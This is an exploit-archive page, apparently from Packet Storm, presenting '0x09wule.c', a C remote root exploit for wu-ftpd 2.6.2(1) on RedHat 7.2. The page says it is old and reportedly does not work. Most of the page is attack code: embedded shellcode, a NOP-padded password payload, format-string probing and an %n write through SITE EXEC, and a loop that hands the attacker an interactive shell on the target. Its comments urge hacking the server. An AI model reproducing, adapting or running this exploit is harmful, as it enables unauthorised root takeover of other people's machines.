exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

0x09wule.c

0x09wule.c
Posted Dec 24, 2002
Authored by Sunnyholer

0x09wule.c is a Linux/x86 wu-ftpd v2.6.2(1) remote root exploit. Tested against RedHat 7.2 running wu-ftpd-2.6.2(1) on the default install. Note: This exploit is reported to be old and does not work.

tags | exploit, remote, x86, root
systems | linux, redhat
SHA-256 | 502aea31745faeeab8856c6ce2be79e52527dc8975026f6c641587a3103b4baa

0x09wule.c

Change Mirror Download
/*
* 0x09wule.c - linux wu-ftpd-2.6.2(1) remote root exploit
* Coded By Sunnyholer` 2002
*
* Private 0dd code, do not distribute it
* This exploit is tested on RedHat 7.2 running on wu-ftpd-2.6.2(1), default install
*
* Cause wu-ftpd is a bad ftpd, dont use it.. hack it!
* Special thanks to: [Evil] & h4xSeed
*
* 0x09 Security groups, borned on 01 november 2002
*
* FSCK Your mind
*
* ## Suplied by D3m3nt3 ## ** NOT TESTED **
*
*/

#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>

void logo() {
printf("0x09wule.c - x86/linux wu-ftpd-2.6.2(1) remote root xploit\n");
printf(" exploit for redhat 7.2 wu-2.6.2(1)\n\n");
}

char linuxcode[]= /* chroot() shellcode */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
"\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
"\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
"\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
"\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
"\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";


main(int argc,char *argv[]) {

char cmdbuf[8192];
char cbuf[1024];
char *t;
char nop[400];
int pip,i,a=22,st=0;
struct sockaddr_in sck;
struct hostent *hp;
long inet;
int port=21;
fd_set fds;
unsigned int aa;
unsigned long reta,retb,tmp,tmp2,retz,ist=0;
int ret;
int add=5;

memset(cmdbuf,0x0,sizeof(cmdbuf));
memset(cbuf,0x0,sizeof(cbuf));
memset(nop,0x0,sizeof(nop));

logo();
if (argc<2)
{
fprintf(stderr,"Usage: %s [ip] [ret_location]\n",argv[0]);
fprintf(stderr,"[ret_location] is optional parametr - it can be two
two things :
1) In format 0xbffffff
2) And in 4,5,6,7,8.. - this supply where exploit
can find ret_location address - standard its 5
!! Use this parametr only if default settings fail\n",argv[0]);

exit(-1);
}

if (argc>2)
{
reta=strtoul(argv[2],argv[2]+10,16);
fprintf(stderr,"++ Using ret address: %x \n",reta);
ist=1;
if (reta<20) { ist=0;add=reta;}
}


pip=socket(PF_INET,SOCK_STREAM,0);

if (!pip)
{
perror("socket()");
exit(-1);
}

inet=inet_addr(argv[1]);
if (inet==-1) {
if (hp=gethostbyname(argv[1])) memcpy(&inet,hp->h_addr,4); else inet=-1;
if (inet==-1)
{
fprintf(stderr,"Cant resolv %s!! \n",argv[1]);
exit(-1);
}
}
sck.sin_family=PF_INET;
sck.sin_port=htons(port);
sck.sin_addr.s_addr=inet;

if (connect(pip,(struct sockaddr *)&sck,sizeof(sck))<0)
{
perror("Connect() ");
exit(-1);
}

read(pip,cbuf,1023);
fprintf(stderr,"Connected to: %s \n",argv[1]);
fprintf(stderr,"Banner: %s \n",cbuf);
// Connected ,sending user info
strcpy(cmdbuf,"user ftp\n");write(pip,cmdbuf,strlen(cmdbuf));
memset(nop,0x90,sizeof(nop)-strlen(linuxcode)-10);

strcat(nop,linuxcode);

memset(cmdbuf,0x0,sizeof(cmdbuf));
sprintf(cmdbuf,"pass %s\n",nop);write(pip,cmdbuf,strlen(cmdbuf));
sleep(5);
read(pip,cmdbuf,sizeof(cmdbuf)-1);
memset(cmdbuf,0x0,sizeof(cmdbuf));
if (!strncmp(cmdbuf,"530",3))
{
printf("loggin incorrect : %s \n",cmdbuf);
exit(-1);
}
fprintf(stderr,"Logged in.. \n");
fprintf(stderr,"+ Finding ret addresses \n");
if (ist==0)
{
// reta
next:
memset(cmdbuf,0x0,sizeof(cmdbuf));sprintf(cmdbuf,"SITE EXEC %%%d$p\n",add);
write(pip,cmdbuf,strlen(cmdbuf));
memset(cmdbuf,0x0,sizeof(cmdbuf));read(pip,cmdbuf,sizeof(cmdbuf)-1);
if (!strncmp(cmdbuf+6,"$p",2))
{
fprintf(stderr,"Wuftpd is not vulnerable : %s \n",cmdbuf);
exit(-1);
}
if (strstr(cmdbuf,"??")) {
fprintf(stderr,"Wuftpd is not vulnerable : %s \n",cmdbuf);
exit(-1);
} else {
fprintf(stderr,"Wuftpd is vulnerable : %s \n",cmdbuf);
}
reta=strtoul(strstr(cmdbuf,"-")+1,strstr(cmdbuf,"-")+11,16);
}
if ((reta&0xff)==0) { add++;goto next;}


//retb
st=0;
a=60;
while (a<=100) {
a++;
memset(cmdbuf,0x0,sizeof(cmdbuf));
sprintf(cmdbuf,"SITE EXEC aaa|%%%d$p\n",a);
write(pip,cmdbuf,strlen(cmdbuf));
memset(cmdbuf,0x0,sizeof(cmdbuf));read(pip,cmdbuf,sizeof(cmdbuf)-1);
usleep(1000);

t=(char *)strstr(cmdbuf,"|");
tmp=0;

if (t!=NULL) tmp=strtoul(t+1,t+11,16);
if (tmp!=0)
{
tmp2=tmp;
tmp=(tmp>>16);
if (tmp==0x807)
{
retb=tmp2;
fprintf(stderr,"Cached with addres : 0x%x\n",retb);st=1;
break;
}
if (tmp==0x806)
{
retb=tmp2;
fprintf(stderr,"Cached with addres : 0x%x\n",retb);st=1;
break;
}

}
}

if (st==0)
{
fprintf(stderr," Sorry couldnt find proctitle address - fix me!!\n");
exit(-1);
}

memset(cmdbuf,0x0,sizeof(cmdbuf));
printf("+ Finding correct offsets \n");
fprintf(stderr,"+ Real ret addr : 0x %x \n",reta-0x58);
if (ist==0) reta=reta-0x58;

st=0;
a=100;
while (a<=320) {
a++;
memset(cmdbuf,0x0,sizeof(cmdbuf));
sprintf(cmdbuf,"SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c|%%%d$p\n",0x74,0xd0,0xff,0xbf,a);
/*
(reta & 0x000000ff),(reta & 0x0000ff00)>>8,
(reta & 0x00ff0000)>>16,
(reta & 0xff000000)>>24,a);*/
write(pip,cmdbuf,strlen(cmdbuf));
memset(cmdbuf,0x0,sizeof(cmdbuf));read(pip,cmdbuf,sizeof(cmdbuf)-1);
#ifdef DEBUG
fprintf(stderr,"Outbuf is : %s \n",cmdbuf);
#endif
usleep(800);
t=(char *)strstr(cmdbuf,"|");
tmp=0;
if (t!=NULL) tmp=strtoul(t+1,t+11,16);
if (tmp!=0)
{
tmp2=tmp;
if ((tmp==reta)||(tmp==0xbfffd074))
{
fprintf(stderr,"Cached with addres : 0x%x and a = %d\n",tmp,a--);st=1;
break;
}
}
}

if (st==0)
{
fprintf(stderr," Sorry couldnt find ret location address - fix me!!\n");
exit(-1);
}
//if (ist==0) reta=reta-0x58;

retb=retb+100;
printf("Ret location : %x \n",reta);
printf("Proctitle addres : %x and %u \n",retb,retb);

// now we are exploiting the bug
aa=retb;
tmp2=reta;
memset(cmdbuf,0x0,sizeof(cmdbuf));read(pip,cmdbuf,sizeof(cmdbuf)-1);
sprintf(cmdbuf,"SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c|%%%d$p\n",0x54,0xd0,0xff,0xbf,a);
/*(tmp2 & 0x000000ff),(tmp2 & 0x0000ff00)>>8,
(tmp2 & 0x00ff0000)>>16,
(tmp2 & 0xff000000)>>24,a);*/
// fprintf(stderr,"slemy : %s \n",cmdbuf);
write(pip,cmdbuf,strlen(cmdbuf));
usleep(500);
memset(cmdbuf,0x0,sizeof(cmdbuf));read(pip,cmdbuf,sizeof(cmdbuf)-1);
t=(char *)strstr(cmdbuf,"|");
tmp=0;
if (t!=NULL) tmp=strtoul(t+1,t+11,16);
if ((tmp!=0)&&(tmp!=reta)) {
fprintf(stderr,"!!! Some problems with ret addres,is : 0x%x \n",tmp);
//exit(-1);
} else {
fprintf(stderr,"!!! Goin thru with : 0x%x \n",tmp);
}

memset(cmdbuf,0x0,sizeof(cmdbuf));
sprintf(cmdbuf,"SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c|%%.%ud%%%d$n\n",(reta & 0x000000ff),(reta & 0x0000ff00)>>8,
(reta & 0x00ff0000)>>16,
(reta & 0xff000000)>>24,aa,a);

write(pip,cmdbuf,strlen(cmdbuf));
memset(cmdbuf,0x0,sizeof(cmdbuf));

fprintf(stderr," Wait for a shell.....\n");
// w8 for shell

while (1)
{
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(pip,&fds);
select(255, &fds,NULL,NULL,NULL);
if (FD_ISSET(pip,&fds))
{
memset(cbuf,0x0,sizeof(cbuf));
ret=read(pip,cbuf,sizeof(cbuf)-1);
if (ret<=0)
{
printf("Connection closed - EOF \n");
exit(-1);
}
printf("%s",cbuf);
}
if (FD_ISSET(0,&fds))
{
memset(cbuf,0x0,sizeof(cbuf));
read(0,cbuf,sizeof(cbuf)-1);
write(pip,cbuf,strlen(cbuf));
}
}
close(pip);
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close